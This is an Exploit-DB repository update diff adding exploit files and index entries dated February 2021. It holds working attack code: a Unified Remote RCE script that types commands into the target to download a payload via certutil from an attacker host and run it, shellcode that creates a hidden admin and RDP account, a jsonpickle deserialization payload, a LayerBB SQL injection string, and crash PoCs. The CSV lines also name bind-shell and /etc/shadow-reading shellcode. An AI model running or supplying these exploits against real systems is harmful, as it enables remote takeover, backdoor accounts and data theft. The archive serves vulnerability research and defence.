DB: 2021-02-25

8 changes to exploits/shellcodes

SpotAuditor 5.3.5 - 'multiple' Denial Of Service (PoC)
Product Key Explorer 4.2.7 - 'multiple' Denial of Service (PoC)
LogonExpert 8.1 - 'LogonExpertSvc' Unquoted Service Path
Softros LAN Messenger 9.6.4 - 'SoftrosSpellChecker' Unquoted Service Path
python jsonpickle 2.0.0 - Remote Code Execution
Unified Remote 3.9.0.2463 - Remote Code Execution

LayerBB 1.1.4 - 'search_query' SQL Injection

Windows/x86 - Add User Alfred to Administrators/Remote Desktop Users Group Shellcode (240 bytes)

exploits/multiple/remote/49585.py

@@ -0,0 +1,27 @@
+# Exploit Title: python jsonpickle 2.0.0 - Remote Code Execution
+# Date: 24-2-2021
+# Vendor Homepage: https://jsonpickle.github.io
+# Exploit Author: Adi Malyanker, Shay Reuven
+# Software Link: https://github.com/jsonpickle/jsonpickle
+# Version: 2.0.0
+# Tested on: windows, linux
+
+# 	Python is an open source language. jsonickle module is provided to convert objects into a serialized form, 
+# 	and later recover the data back into an object. the decode is used to undeserialize serialized strings.
+
+# 	If malicious data is deserialized, it will execute arbitrary Python commands. It is also possible to make system() calls. 
+# 	the problem is in the inner function loadrepr function which eval each serialized string which contains "py/repr".
+
+#	The vulnerability exists from the first version till the current version for backward compatibility. no patch is provided yet
+
+#	the payload was found during our research made on deserialization functions.
+
+# 	the pattern should be :
+# 	{..{"py/repr":<the module to import>/<the command to be executed.>}..}
+
+# 	example:
+
+malicious = '{"1": {"py/repr": "time/time.sleep(10)"}, "2": {"py/id": 67}}'
+
+# 	the command on the server side
+some_parameter = jsonpickle.decode(malicious)

exploits/php/webapps/49593.txt

@@ -0,0 +1,10 @@
+# Exploit Title: LayerBB 1.1.4 - 'search_query' SQL Injection
+# Date: 2021-02-19
+# Exploit Author: Görkem Haşin
+# Version: 1.1.4
+# Tested on: Linux/Windows
+
+# POST /search.php HTTP/1.1
+# Host: Target
+
+Payload: search_query=Lffd') AND 8460=(SELECT (CASE WHEN (8460=8460) THEN 8460 ELSE (SELECT 1560 UNION SELECT 2122) END))-- -&search_submit=Search

exploits/windows/dos/49589.py

@@ -0,0 +1,30 @@
+# Exploit Title: SpotAuditor 5.3.5  - 'multiple' Denial Of Service (PoC)
+# Exploit Author : Sinem Şahin
+# Exploit Date: 2021-02-10
+# Vendor Homepage : http://www.nsauditor.com/
+# Link Software : http://spotauditor.nsauditor.com/downloads/spotauditor_setup.exe
+# Tested on: Windows 7 x64
+# Version: 5.3.5
+
+
+# Steps: 
+ 1- Run the python script. (exploit.py)
+ 2- Open payload.txt and copy content to clipboard.
+ 3- Run 'SpotAuditor 5.3.5'.
+ 4- Register -> Enter Registration Code
+ 5- Paste clipboard into the "Name" or "Key".
+ 6- Click on OK.
+ 7- Crashed.
+
+---> exploit.py <--
+
+#!/usr/bin/env python
+buffer = "\x41" * 300
+
+try:
+    f = open("payload.txt","w")
+    f.write(buffer)
+    f.close()
+    print"File okey!!"
+except:
+    print "File is not created."

exploits/windows/dos/49590.py

@@ -0,0 +1,30 @@
+# Exploit Title: Product Key Explorer 4.2.7 - 'multiple' Denial of Service (PoC)
+# Exploit Author : Sinem Şahin
+# Exploit Date: 2021-02-23
+# Vendor Homepage : http://www.nsauditor.com/
+# Link Software : http://www.nsauditor.com/downloads/productkeyexplorer_setup.exe
+# Version: 4.2.7
+# Tested on: Windows 7 x64
+
+
+# Steps: 
+1- Run the python script. (exploit.py)
+2- Open payload.txt and copy content to clipboard.
+3- Run 'Product Key Explorer 4.2.7'. 
+4- Register -> Enter Registration Code
+5- Paste clipboard into the "Key" or "Name".
+6- Click on OK.
+7- Crashed.
+
+---> exploit.py <--
+
+#!/usr/bin/env python
+buffer = "\x41" * 300
+
+try:
+    f = open("payload.txt","w")
+    f.write(buffer)
+    f.close()
+    print "File created!"
+except:
+    print "File cannot be created!!"

exploits/windows/local/49586.txt

@@ -0,0 +1,28 @@
+# Exploit Title: LogonExpert 8.1 - 'LogonExpertSvc' Unquoted Service Path
+# Discovery by: Victor Mondragón
+# Discovery Date: 23-02-2021
+# Vendor Homepage: https://www.softros.com/
+# Software Links : https://download.logonexpert.com/LogonExpertSetup64.msi
+# Tested Version: 8.1
+# Vulnerability Type: Unquoted Service Path
+# Tested on: Windows 7 Service Pack 1 x64
+# Step to discover Unquoted Service Path: 
+ 
+
+C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """
+LogonExpert Service             LogonExpertSvc          C:\Program Files\Softros Systems\LogonExpert\LogonExpertService.exe             Auto
+
+
+C:\>sc qc LogonExpertSvc
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: LogonExpertSvc
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files\Softros Systems\LogonExpert\LogonExpertService.exe
+        LOAD_ORDER_GROUP   : LogonExpertGroup
+        TAG                : 0
+        DISPLAY_NAME       : LogonExpert Service
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem

exploits/windows/local/49588.txt

@@ -0,0 +1,28 @@
+# Exploit Title: Softros LAN Messenger 9.6.4 - 'SoftrosSpellChecker' Unquoted Service Path
+# Discovery by: Victor Mondragón
+# Discovery Date: 23-02-2021
+# Vendor Homepage: https://www.softros.com/
+# Software Links : https://download.softros.com/SoftrosLANMessengerSetup.exe
+# Tested Version: 9.6.4
+# Vulnerability Type: Unquoted Service Path
+# Tested on: Windows 10 Pro 64 bits
+
+# Step to discover Unquoted Service Path: 
+ 
+
+C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """
+Softros Spell Checker           SoftrosSpellChecker     C:\Program Files (x86)\Softros Systems\Softros Messenger\Spell Checker\SoftrosSpellChecker.exe      Auto
+
+C:\>sc qc SoftrosSpellChecker
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: SoftrosSpellChecker
+        TIPO               : 10  WIN32_OWN_PROCESS
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 0   IGNORE
+        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Softros Systems\Softros Messenger\Spell Checker\SoftrosSpellChecker.exe
+        GRUPO_ORDEN_CARGA  : System Reserved
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : Softros Spell Checker
+        DEPENDENCIAS       :
+        NOMBRE_INICIO_SERVICIO: LocalSystem

exploits/windows/remote/49587.py

@@ -0,0 +1,137 @@
+# Exploit Title: Unified Remote 3.9.0.2463 - Remote Code Execution
+# Author: H4rk3nz0
+# Vendor Homepage: https://www.unifiedremote.com/
+# Software Link: https://www.unifiedremote.com/download
+# Tested on: Windows 10, 10.0.19042 Build 19042
+
+#!/usr/bin/python
+
+import socket
+import sys
+import os
+from time import sleep
+
+target = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+
+port = 9512
+
+# Packet Data Declarations; Windows, Space and Enter have non-standard values
+
+open = ("00000085000108416374696f6e00000550617373776f72640038653831333362332d61313862"
+"2d343361662d613763642d6530346637343738323763650005506c6174666f726d00616e64726f696400"
+"0852657175657374000005536f7572636500616e64726f69642d64373038653134653532383463623831"
+"000356657273696f6e000000000a00").decode("hex")
+
+open_fin = ("000000c8000108416374696f6e0001024361706162696c69746965730004416374696f6e7"
+"3000104456e6372797074696f6e3200010446617374000004477269640001044c6f6164696e6700010453"
+"796e630001000550617373776f72640064363334633164636664656238373335363038613461313034646"
+"5643430373664653736366464363134343336313938303961643766333538353864343439320008526571"
+"75657374000105536f7572636500616e64726f69642d643730386531346535323834636238310000"
+).decode("hex")
+
+one = ("000000d2000108416374696f6e00070549440052656c6d746563682e4b6579626f61726400024"
+"c61796f75740006436f6e74726f6c73000200024f6e416374696f6e0002457874726173000656616c756"
+"5730002000556616c756500").decode("hex")
+
+two = ("00000000054e616d6500746f67676c6500000854797065000800000008526571756573740007"
+"0252756e0002457874726173000656616c7565730002000556616c756500").decode("hex")
+
+three = ("00000000054e616d6500746f67676c65000005536f7572636500616e64726f69642d643730"
+"386531346535323834636238310000").decode("hex")
+
+win_key = ("000000d8000108416374696f6e00070549440052656c6d746563682e4b6579626f61726"
+"400024c61796f75740006436f6e74726f6c73000200024f6e416374696f6e000245787472617300065"
+"6616c7565730002000556616c7565004c57494e00000000054e616d6500746f67676c6500000854797"
+"0650008000000085265717565737400070252756e0002457874726173000656616c756573000200055"
+"6616c7565004c57494e00000000054e616d6500746f67676c65000005536f7572636500616e64726f6"
+"9642d643730386531346535323834636238310000").decode("hex")
+
+ret_key = ("000000dc000108416374696f6e00070549440052656c6d746563682e4b6579626f6172"
+"6400024c61796f75740006436f6e74726f6c73000200024f6e416374696f6e0002457874726173000"
+"656616c7565730002000556616c75650052455455524e00000000054e616d6500746f67676c650000"
+"08547970650008000000085265717565737400070252756e0002457874726173000656616c7565730"
+"002000556616c75650052455455524e00000000054e616d6500746f67676c65000005536f75726365"
+"00616e64726f69642d643730386531346535323834636238310000").decode("hex")
+
+space_key = ("000000da000108416374696f6e00070549440052656c6d746563682e4b6579626f6"
+"1726400024c61796f75740006436f6e74726f6c73000200024f6e416374696f6e000245787472617"
+"3000656616c7565730002000556616c756500535041434500000000054e616d6500746f67676c650"
+"00008547970650008000000085265717565737400070252756e0002457874726173000656616c756"
+"5730002000556616c756500535041434500000000054e616d6500746f67676c65000005536f75726"
+"36500616e64726f69642d643730386531346535323834636238310000").decode("hex")
+
+# ASCII to Hex Conversion Set
+characters={
+	"A":"41","B":"42","C":"43","D":"44","E":"45","F":"46","G":"47","H":"48","I":"49","J":"4a","K":"4b","L":"4c","M":"4d","N":"4e",
+	"O":"4f","P":"50","Q":"51","R":"52","S":"53","T":"54","U":"55","V":"56","W":"57","X":"58","Y":"59","Z":"5a",
+	"a":"61","b":"62","c":"63","d":"64","e":"65","f":"66","g":"67","h":"68","i":"69","j":"6a","k":"6b","l":"6c","m":"6d","n":"6e",
+	"o":"6f","p":"70","q":"71","r":"72","s":"73","t":"74","u":"75","v":"76","w":"77","x":"78","y":"79","z":"7a",
+	"1":"31","2":"32","3":"33","4":"34","5":"35","6":"36","7":"37","8":"38","9":"39","0":"30",
+	"+":"2b","=":"3d","/":"2f","_":"5f","<":"3c",
+	">":"3e","[":"5b","]":"5d","!":"21","@":"40","#":"23","$":"24","%":"25","^":"5e","&":"26","*":"2a",
+	"(":"28",")":"29","-":"2d","'":"27",'"':"22",":":"3a",";":"3b","?":"3f","`":"60","~":"7e",
+	"\\":"5c","|":"7c","{":"7b","}":"7d",",":"2c",".":"2e"}
+
+# User Specified arguments
+try:
+	rhost = sys.argv[1]
+	lhost = sys.argv[2]
+	payload = sys.argv[3]
+except:
+	print("Usage: python " + sys.argv[0] + " <target-ip> <local-http-ip> <payload-name>")
+
+
+# Send Windows Key Input Twice
+def SendWin():
+	target.sendto(win_key,(rhost, port))
+	target.sendto(win_key,(rhost, port))
+	sleep(0.4)
+
+
+# Send Enter/Return Key Input
+def SendReturn():
+	target.sendto(ret_key,(rhost, port))
+	sleep(0.4)
+
+# Send String Characters
+def SendString(string, rhost):
+	for char in string:
+		if char == " ":
+			target.sendto(space_key,(rhost, port))
+			sleep(0.02)
+		else:
+			convert = characters[char].decode("hex")
+			target.sendto(one + convert + two + convert + three,(rhost, port))
+			sleep(0.02)
+
+# Main Execution
+def main():
+	target.connect((rhost,port))
+	sleep(0.5)
+	print("[+] Connecting to target...")
+	target.sendto(open,(rhost,port)) 	# Initialize Connection to Unified
+	sleep(0.02)
+	target.sendto(open_fin,(rhost,port)) 	# Finish Initializing Connection
+	print("[+] Popping Start Menu")
+	sleep(0.02)
+	SendWin()
+	sleep(0.3)
+	print("[+] Opening CMD")
+	SendString("cmd.exe", rhost)
+	sleep(0.3)
+	SendReturn()
+	sleep(0.3)
+	print("[+] *Super Fast Hacker Typing*")
+	SendString("certutil.exe -f -urlcache http://" + lhost + "/" + payload + " C:\\Windows\\Temp\\" + payload, rhost) # Retrieve HTTP hosted payload
+	sleep(0.3)
+	print("[+] Downloading Payload")
+	SendReturn()
+	sleep(3)
+	SendString("C:\\Windows\\Temp\\" + payload, rhost) # Execute Payload
+	sleep(0.3)
+	SendReturn()
+	print("[+] Done! Check listener?")
+	target.close()
+
+if __name__=="__main__":
+	main()

files_exploits.csv

@@ -6755,6 +6755,8 @@ id,file,description,date,author,type,platform,port
 48617,exploits/windows/dos/48617.py,"Code Blocks 20.03 - Denial Of Service (PoC)",2020-06-23,"Paras Bhatia",dos,windows,
 48637,exploits/windows/dos/48637.py,"Fire Web Server 0.1 - Remote Denial of Service (PoC)",2020-07-06,"Saeed reza Zamanian",dos,windows,
 48638,exploits/linux/dos/48638.sh,"Grafana 7.0.1 - Denial of Service (PoC)",2020-07-06,mostwanted002,dos,linux,
+49589,exploits/windows/dos/49589.py,"SpotAuditor 5.3.5 - 'multiple' Denial Of Service (PoC)",2021-02-24,"Sinem Şahin",dos,windows,
+49590,exploits/windows/dos/49590.py,"Product Key Explorer 4.2.7 - 'multiple' Denial of Service (PoC)",2021-02-24,"Sinem Şahin",dos,windows,
 48697,exploits/windows/dos/48697.py,"Calavera UpLoader 3.5 - 'FTP Logi' Denial of Service (PoC + SEH Overwrite)",2020-07-26,"Felipe Winsnes",dos,windows,
 48728,exploits/windows/dos/48728.py,"Mocha Telnet Lite for iOS 4.2 - 'User' Denial of Service (PoC)",2020-08-04,"Luis Martínez",dos,windows,
 48729,exploits/windows/dos/48729.py,"RTSP for iOS 1.0 - 'IP Address' Denial of Service (PoC)",2020-08-04,"Luis Martínez",dos,windows,
@@ -11175,6 +11177,8 @@ id,file,description,date,author,type,platform,port
 48469,exploits/windows/local/48469.py,"Dameware Remote Support 12.1.1.273 - Buffer Overflow (SEH)",2020-05-14,gurbanli,local,windows,
 48461,exploits/windows/local/48461.py,"LanSend 3.2 - Buffer Overflow (SEH)",2020-05-12,gurbanli,local,windows,
 49577,exploits/windows/local/49577.py,"dataSIMS Avionics ARINC 664-1 - Local Buffer Overflow (PoC)",2021-02-19,"Kağan Çapar",local,windows,
+49586,exploits/windows/local/49586.txt,"LogonExpert 8.1 - 'LogonExpertSvc' Unquoted Service Path",2021-02-24,"Victor Mondragón",local,windows,
+49588,exploits/windows/local/49588.txt,"Softros LAN Messenger 9.6.4 - 'SoftrosSpellChecker' Unquoted Service Path",2021-02-24,"Victor Mondragón",local,windows,
 48464,exploits/macos/local/48464.py,"MacOS 320.whatis Script - Privilege Escalation",2020-05-12,"Csaba Fitzl",local,macos,
 48499,exploits/windows/local/48499.txt,"CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASLR)",2020-05-21,"Xenofon Vassilakopoulos",local,windows,
 48505,exploits/windows/local/48505.txt,"Druva inSync Windows Client 6.6.3 - Local Privilege Escalation",2020-05-22,"Matteo Malvica",local,windows,
@@ -18355,6 +18359,8 @@ id,file,description,date,author,type,platform,port
 48410,exploits/multiple/remote/48410.rb,"Apache Shiro 1.2.4 - Cookie RememberME Deserial RCE (Metasploit)",2020-05-01,Metasploit,remote,multiple,
 48421,exploits/multiple/remote/48421.txt,"Saltstack 3000.1 - Remote Code Execution",2020-05-05,"Jasper Lievisse Adriaanse",remote,multiple,
 49584,exploits/windows/remote/49584.py,"HFS (HTTP File Server) 2.3.x - Remote Command Execution (3)",2021-02-23,Pergyz,remote,windows,
+49585,exploits/multiple/remote/49585.py,"python jsonpickle 2.0.0 - Remote Code Execution",2021-02-24,"Adi Malyanker",remote,multiple,
+49587,exploits/windows/remote/49587.py,"Unified Remote 3.9.0.2463 - Remote Code Execution",2021-02-24,H4rk3nz0,remote,windows,
 48483,exploits/multiple/remote/48483.txt,"HP LinuxKI 6.01 - Remote Command Injection",2020-05-18,"Cody Winkler",remote,multiple,
 48491,exploits/php/remote/48491.rb,"Pi-Hole - heisenbergCompensator Blocklist OS Command Execution (Metasploit)",2020-05-19,Metasploit,remote,php,
 48508,exploits/multiple/remote/48508.rb,"WebLogic Server - Deserialization RCE - BadAttributeValueExpException (Metasploit)",2020-05-22,Metasploit,remote,multiple,
@@ -43775,3 +43781,4 @@ id,file,description,date,author,type,platform,port
 49569,exploits/php/webapps/49569.txt,"Faulty Evaluation System 1.0 - 'multiple' Stored Cross-Site Scripting",2021-02-17,"Suresh Kumar",webapps,php,
 49570,exploits/php/webapps/49570.txt,"Billing Management System 2.0 - 'email' SQL injection Auth Bypass",2021-02-17,"Pintu Solanki",webapps,php,
 49573,exploits/php/webapps/49573.py,"Batflat CMS 1.3.6 - Remote Code Execution (Authenticated)",2021-02-18,mari0x00,webapps,php,
+49593,exploits/php/webapps/49593.txt,"LayerBB 1.1.4 - 'search_query' SQL Injection",2021-02-24,"Görkem Haşin",webapps,php,

files_shellcodes.csv

@@ -1031,3 +1031,4 @@ id,file,description,date,author,type,platform
 49466,shellcodes/windows_x86/49466.asm,"Windows/x86 - Download File (http://10.10.10.5:8080/2NWyfQ9T.hta) Via mshta + Execute + Stager Shellcode (143 bytes)",2021-01-22,"Armando Huesca Prida",shellcode,windows_x86
 49472,shellcodes/linux/49472.c,"Linux/x64 - Bind_tcp (0.0.0.0:4444) + Password (12345678) + Shell (/bin/sh) Shellcode (142 bytes)",2021-01-25,"Guillem Alminyana",shellcode,linux
 49547,shellcodes/linux_x86-64/49547.c,"Linux/x64 - execve _cat /etc/shadow_ Shellcode (66 bytes)",2021-02-09,"Felipe Winsnes",shellcode,linux_x86-64
+49592,shellcodes/windows_x86/49592.asm,"Windows/x86 - Add User Alfred to Administrators/Remote Desktop Users Group Shellcode (240 bytes)",2021-02-24,"Armando Huesca Prida",shellcode,windows_x86

shellcodes/windows_x86/49592.asm

@@ -0,0 +1,84 @@
+# Exploit Title: Windows/x86 - Add User Alfred to Administrators/Remote Desktop Users Group Shellcode (240 bytes)
+# Exploit Author: Armando Huesca Prida
+# Date: 20-02-2021
+#
+# Tested on: 
+# Windows 7 Professional 6.1.7601 SP1 Build 7601 (x86)
+# Windows Vista Ultimate 6.0.6002 SP2 Build 6002 (x86)
+# Windows Server 2003 Enterprise Edition 5.2.3790 SP1 Build 3790 (x86)
+#
+# Description:
+# Windows x86 Shellcode that uses CreateProcessA Windows API to add a new user to administrators and remote desktop users group. This shellcode uses JMP/CALL/POP technique and static kernel32.dll functions addresses.
+# It's possible to bypass bad-chars by switching the message db string between uppercase and lowercase letters.
+#
+# Shellcode considerations:
+# Function address of CreateProcessA in kernel32.dll: 0x77082082
+# Function address of ExitProcess in kernel32.dll: 0x770d214f
+# Administartor user credentials: alfred:test
+# Size of message db parameter, 152 bytes -> 0x98 hex =3D 0x111111A9 - 0x11111111 (0x00 badchar avoidance) ;)
+#
+
+
+# Assembly shellcode:
+
+global _start
+
+section .text
+
+_start:
+jmp application
+
+firststep:
+pop edi
+xor eax, eax
+mov esi, 0x111111A9
+sub esi, 0x11111111
+mov [edi+esi], al   ; size of message db parameter
+
+StartUpInfoANDProcessInformation:
+push eax; hStderror null in this case
+push eax; hStdOutput, null
+push eax; hStdInput, null
+xor ebx, ebx
+xor ecx, ecx
+add cl, 0x12; 18 times loop to fill both structures.
+
+looper:
+push ebx
+loop looper
+
+;mov word [esp+0x3c], 0x0101; dwflag arg in startupinfo
+mov bx, 0x1111
+sub bx, 0x1010
+mov word [esp+0x3c], bx
+mov byte [esp+0x10], 0x44; cb=3D0x44
+lea eax, [esp+0x10]; eax points to StartUpInfo
+
+; eax holds a pointer to StartUPinfo
+; esp holds a pointer to Process_Info filled of null values
+
+createprocessA:
+push esp; pointer to Process-Info
+push eax; pointer to StartUpInfo
+xor ebx, ebx
+push ebx; null
+push ebx; null
+push ebx; null
+inc ebx
+push ebx; bInheritHandles=3Dtrue
+dec ebx
+push ebx; null
+push ebx; null
+push edi; pointer to message db string
+push ebx; null
+mov edx, 0x77082082; CreateProcessA addr in kernel32.dll
+call edx
+
+ExitProcess:
+push eax; createprocessA return in eax
+mov edx, 0x770d214f; ExitProcess addr in kernel32.dll
+call edx
+
+application:
+call firststep
+message db 'c:\windows\system32\cmd.exe /c net user alfred test /add & net localgroup ADMINISTRATORS alfred /add & net localgroup "Remote Desktop Users" alfred /add'